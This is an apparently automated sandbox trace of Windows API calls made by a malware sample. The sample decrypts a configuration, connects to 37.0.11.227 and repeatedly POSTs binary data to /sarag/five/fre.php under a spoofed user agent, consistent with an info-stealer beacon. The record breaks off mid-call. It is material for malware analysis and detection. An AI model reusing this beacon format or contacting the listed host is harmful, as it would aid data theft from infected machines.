[0187.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.783] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0187.789] GetProcessHeap () returned 0x690000 [0187.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0187.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.790] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0187.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.790] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.791] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.791] GetProcessHeap () returned 0x690000 [0187.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0187.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.793] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0187.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.794] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0187.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.795] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0187.795] GetProcessHeap () returned 0x690000 [0187.795] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0187.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.796] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0187.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.796] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0187.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.798] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0187.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.798] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0187.798] GetProcessHeap () returned 0x690000 [0187.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0187.799] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3f60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0187.799] GetProcessHeap () returned 0x690000 [0187.799] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0187.799] socket (af=2, type=1, protocol=6) returned 0x358 [0187.799] connect (s=0x358, name=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0187.822] FreeAddrInfoW (pAddrInfo=0x6b3f60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0187.822] GetProcessHeap () returned 0x690000 [0187.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0187.822] GetProcessHeap () returned 0x690000 [0187.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b3f90 [0187.822] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0187.823] wvsprintfA (in: param_1=0x6b3f90, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0187.823] GetProcessHeap () returned 0x690000 [0187.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0187.823] GetProcessHeap () returned 0x690000 [0187.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0187.824] GetProcessHeap () returned 0x690000 [0187.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0187.824] GetProcessHeap () returned 0x690000 [0187.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b3f90 [0187.824] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0187.825] wvsprintfA (in: param_1=0x6b3f90, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0187.825] GetProcessHeap () returned 0x690000 [0187.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0187.825] GetProcessHeap () returned 0x690000 [0187.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0187.826] send (s=0x358, buf=0x6abd08*, len=242, flags=0) returned 242 [0187.826] send (s=0x358, buf=0x6aba40*, len=159, flags=0) returned 159 [0187.826] GetProcessHeap () returned 0x690000 [0187.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0187.826] recv (in: s=0x358, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0187.908] GetProcessHeap () returned 0x690000 [0187.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0187.909] GetProcessHeap () returned 0x690000 [0187.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0187.909] GetProcessHeap () returned 0x690000 [0187.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0187.909] GetProcessHeap () returned 0x690000 [0187.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0187.910] closesocket (s=0x358) returned 0 [0187.910] GetProcessHeap () returned 0x690000 [0187.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0187.910] GetProcessHeap () returned 0x690000 [0187.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0187.911] GetProcessHeap () returned 0x690000 [0187.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0187.911] GetProcessHeap () returned 0x690000 [0187.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0187.911] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10ac) returned 0x358 [0187.921] Sleep (dwMilliseconds=0xea60) [0187.923] GetProcessHeap () returned 0x690000 [0187.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0187.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.924] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.931] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0187.938] GetProcessHeap () returned 0x690000 [0187.938] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0187.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.939] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0187.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.947] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.948] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.948] GetProcessHeap () returned 0x690000 [0187.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0187.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.950] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0187.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.951] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0187.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.952] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0187.952] GetProcessHeap () returned 0x690000 [0187.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0187.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.953] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0187.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.954] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0187.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.955] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0187.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.956] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0187.956] GetProcessHeap () returned 0x690000 [0187.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0187.956] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0187.957] GetProcessHeap () returned 0x690000 [0187.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0187.957] GetProcessHeap () returned 0x690000 [0187.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0187.957] GetProcessHeap () returned 0x690000 [0187.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0187.958] GetProcessHeap () returned 0x690000 [0187.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0187.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.958] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.964] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0187.970] GetProcessHeap () returned 0x690000 [0187.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0187.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.972] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0187.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.972] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.973] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.973] GetProcessHeap () returned 0x690000 [0187.974] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0187.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.975] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0187.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.975] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0187.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.976] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0187.976] GetProcessHeap () returned 0x690000 [0187.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0187.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.977] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0187.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.978] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0187.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.979] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0187.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.979] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0187.979] GetProcessHeap () returned 0x690000 [0187.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0187.979] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3ec0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0187.980] GetProcessHeap () returned 0x690000 [0187.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0187.980] socket (af=2, type=1, protocol=6) returned 0x35c [0187.980] connect (s=0x35c, name=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0188.006] FreeAddrInfoW (pAddrInfo=0x6b3ec0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0188.006] GetProcessHeap () returned 0x690000 [0188.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0188.006] GetProcessHeap () returned 0x690000 [0188.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b3f90 [0188.006] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0188.007] wvsprintfA (in: param_1=0x6b3f90, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0188.007] GetProcessHeap () returned 0x690000 [0188.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0188.007] GetProcessHeap () returned 0x690000 [0188.008] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0188.008] GetProcessHeap () returned 0x690000 [0188.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0188.008] GetProcessHeap () returned 0x690000 [0188.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b3f90 [0188.009] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0188.009] wvsprintfA (in: param_1=0x6b3f90, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0188.009] GetProcessHeap () returned 0x690000 [0188.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0188.009] GetProcessHeap () returned 0x690000 [0188.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0188.010] send (s=0x35c, buf=0x6abd08*, len=242, flags=0) returned 242 [0188.010] send (s=0x35c, buf=0x6aba40*, len=159, flags=0) returned 159 [0188.010] GetProcessHeap () returned 0x690000 [0188.010] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0188.010] recv (in: s=0x35c, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0188.090] GetProcessHeap () returned 0x690000 [0188.090] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0188.090] GetProcessHeap () returned 0x690000 [0188.091] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0188.091] GetProcessHeap () returned 0x690000 [0188.091] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0188.092] GetProcessHeap () returned 0x690000 [0188.092] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0188.092] closesocket (s=0x35c) returned 0 [0188.093] GetProcessHeap () returned 0x690000 [0188.093] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0188.093] GetProcessHeap () returned 0x690000 [0188.093] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0188.093] GetProcessHeap () returned 0x690000 [0188.094] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0188.094] GetProcessHeap () returned 0x690000 [0188.094] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0188.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10b8) returned 0x35c [0188.095] Sleep (dwMilliseconds=0xea60) [0188.270] GetProcessHeap () returned 0x690000 [0188.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0188.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.272] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.280] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0188.324] GetProcessHeap () returned 0x690000 [0188.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0188.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.326] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0188.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.327] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.334] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.334] GetProcessHeap () returned 0x690000 [0188.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0188.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.338] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0188.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.346] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0188.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.346] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0188.346] GetProcessHeap () returned 0x690000 [0188.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0188.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.347] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0188.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.348] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0188.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.349] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0188.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0188.350] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0188.350] GetProcessHeap () returned 0x690000 [0188.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0188.350] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0188.351] GetProcessHeap () returned 0x690000 [0188.352] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0188.354] GetProcessHeap () returned 0x690000 [0188.354] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0188.355] GetProcessHeap () returned 0x690000 [0188.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0188.355] GetProcessHeap () returned 0x690000 [0188.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0188.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.356] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.361] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0188.367] GetProcessHeap () returned 0x690000 [0188.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0188.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.368] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0188.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.368] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.370] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.370] GetProcessHeap () returned 0x690000 [0188.370] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0188.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0188.371] CryptDecrypt (in: hKey=0x69cfa8, 